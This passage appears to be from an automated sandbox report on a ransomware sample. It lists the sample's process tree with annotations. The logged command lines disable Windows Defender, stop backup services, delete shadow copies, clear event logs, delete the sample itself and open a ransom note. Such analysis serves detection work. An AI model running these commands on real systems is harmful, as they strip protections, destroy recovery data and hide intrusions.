  - C:\Windows\SysWOW64\sc.exe (PID 3324)
    sc.exe config "VSS" start= disabled
    - Launches sc.exe
  - C:\Windows\SysWOW64\sc.exe (PID 3900)
    sc.exe config "vmicvss" start= disabled
    - Launches sc.exe
  - C:\Windows\SysWOW64\sc.exe (PID 5108)
    sc.exe config "SamSs" start= disabled
    - Launches sc.exe
  - C:\Windows\SysWOW64\sc.exe (PID 1396)
    sc.exe config "wbengine" start= disabled
    - Launches sc.exe
  - C:\Windows\SysWOW64\net.exe (PID 1936)
    net.exe stop "WebClient" /y
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\sc.exe (PID 2724)
    sc.exe config "UnistoreSvc_156f2" start= disabled
    - Launches sc.exe
  - C:\Windows\SysWOW64\reg.exe (PID 3372)
    reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    - Modifies Windows Defender Real-time Protection settings
  - C:\Windows\SysWOW64\reg.exe (PID 3836)
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
  - C:\Windows\SysWOW64\reg.exe (PID 3412)
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - C:\Windows\SysWOW64\reg.exe (PID 3160)
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - C:\Windows\SysWOW64\reg.exe (PID 3952)
    reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\SysWOW64\schtasks.exe (PID 5016)
    schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - C:\Windows\SysWOW64\reg.exe (PID 3620)
    reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  - C:\Windows\SysWOW64\reg.exe (PID 4808)
    reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SysWOW64\reg.exe (PID 4076)
    reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SysWOW64\wevtutil.exe (PID 1508)
    wevtutil.exe cl system
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\vssadmin.exe (PID 764)
    vssadmin.exe delete shadows /all /quiet
    - Interacts with shadow copies
  - C:\Windows\SysWOW64\reg.exe (PID 4128)
    reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    - Modifies security service
  - C:\Windows\SysWOW64\Wbem\wmic.exe (PID 2728)
    wmic.exe SHADOWCOPY /nointeractive
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\wevtutil.exe (PID 4856)
    wevtutil.exe cl application
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\Wbem\wmic.exe (PID 1720)
    wmic.exe shadowcopy delete
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 364)
    cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    - C:\Program Files\Windows Defender\MpCmdRun.exe (PID 64)
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      - Deletes Windows Defender Definitions
  - C:\Windows\SysWOW64\cmd.exe (PID 2128)
    cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  - C:\Windows\SysWOW64\wevtutil.exe (PID 4700)
    wevtutil.exe cl security
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\reg.exe (PID 1120)
    reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SysWOW64\reg.exe (PID 628)
    reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SysWOW64\reg.exe (PID 404)
    reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SysWOW64\reg.exe (PID 3776)
    reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\SysWOW64\reg.exe (PID 4324)
    reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    - Modifies registry class
  - C:\Windows\SysWOW64\reg.exe (PID 4360)
    reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    - Modifies registry class
  - C:\Windows\SysWOW64\reg.exe (PID 2668)
    reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  - C:\Windows\SysWOW64\reg.exe (PID 812)
    reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  - C:\Windows\SysWOW64\schtasks.exe (PID 2396)
    schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  - C:\Windows\SysWOW64\schtasks.exe (PID 3100)
    schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  - C:\Windows\SysWOW64\schtasks.exe (PID 4728)
    schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - C:\Windows\SysWOW64\schtasks.exe (PID 2184)
    schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - C:\Windows\SysWOW64\reg.exe (PID 3268)
    reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\SysWOW64\reg.exe (PID 4524)
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - C:\Windows\SysWOW64\reg.exe (PID 1192)
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - C:\Windows\SysWOW64\reg.exe (PID 396)
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
  - C:\Windows\SysWOW64\reg.exe (PID 824)
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
  - C:\Windows\SysWOW64\reg.exe (PID 4284)
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
  - C:\Windows\SysWOW64\reg.exe (PID 1064)
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
  - C:\Windows\SysWOW64\reg.exe (PID 4944)
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - C:\Windows\SysWOW64\reg.exe (PID 3244)
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - C:\Windows\SysWOW64\reg.exe (PID 3196)
    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - C:\Windows\SysWOW64\reg.exe (PID 524)
    reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SysWOW64\sc.exe (PID 428)
    sc.exe config "WebClient" start= disabled
    - Launches sc.exe
  - C:\Windows\SysWOW64\net.exe (PID 4376)
    net.exe stop "wbengine" /y
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\net.exe (PID 960)
    net.exe stop "VSS" /y
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\net.exe (PID 3292)
    net.exe stop "vmicvss" /y
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\net.exe (PID 4644)
    net.exe stop "SstpSvc" /y
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\net.exe (PID 4504)
    net.exe stop "SDRSVC" /y
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 1304)
    cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  - C:\Windows\SysWOW64\cmd.exe (PID 624)
    cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"
  - C:\Windows\SysWOW64\notepad.exe (PID 348)
    notepad.exe C:\EGdu_HOW_TO_DECRYPT.txt
    - Opens file in notepad (likely ransom note)
- C:\Windows\SysWOW64\net1.exe (PID 4056)
  C:\Windows\system32\net1 stop "SDRSVC" /y
- C:\Windows\SysWOW64\net1.exe (PID 2536)
  C:\Windows\system32\net1 stop "vmicvss" /y
- C:\Windows\SysWOW64\net1.exe (PID 4316)
  C:\Windows\system32\net1 stop "UnistoreSvc_156f2" /y
- C:\Windows\SysWOW64\net1.exe (PID 4476)
  C:\Windows\system32\net1 stop "WebClient" /y
- C:\Windows\System32\Conhost.exe (PID 4476)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1516)
  powershell Set-MpPreference -DisableIOAVProtection $true
  - Suspicious behavior: EnumeratesProcesses
- C:\Windows\SysWOW64\net1.exe (PID 3656)
  C:\Windows\system32\net1 stop "wbengine" /y
- C:\Windows\System32\Conhost.exe (PID 3776)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - Modifies registry class
- C:\Windows\SysWOW64\net1.exe (PID 4112)
  C:\Windows\system32\net1 stop "VSS" /y
- C:\Windows\SysWOW64\net1.exe (PID 4220)
  C:\Windows\system32\net1 stop "SstpSvc" /y
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4208)
  powershell Set-MpPreference -DisableRealtimeMonitoring $true
  - Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\NOTEPAD.EXE (PID 1704)
  "C:\Windows\system32\NOTEPAD.EXE" F:\EGdu_HOW_TO_DECRYPT.txt
- C:\Windows\System32\rundll32.exe (PID 4696)
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- C:\Windows\SysWOW64\PING.EXE (PID 4576)
  ping.exe -n 5 127.0.0.1
  - Runs ping.exe
Network
MITRE ATT&CK Enterprise v15
Downloads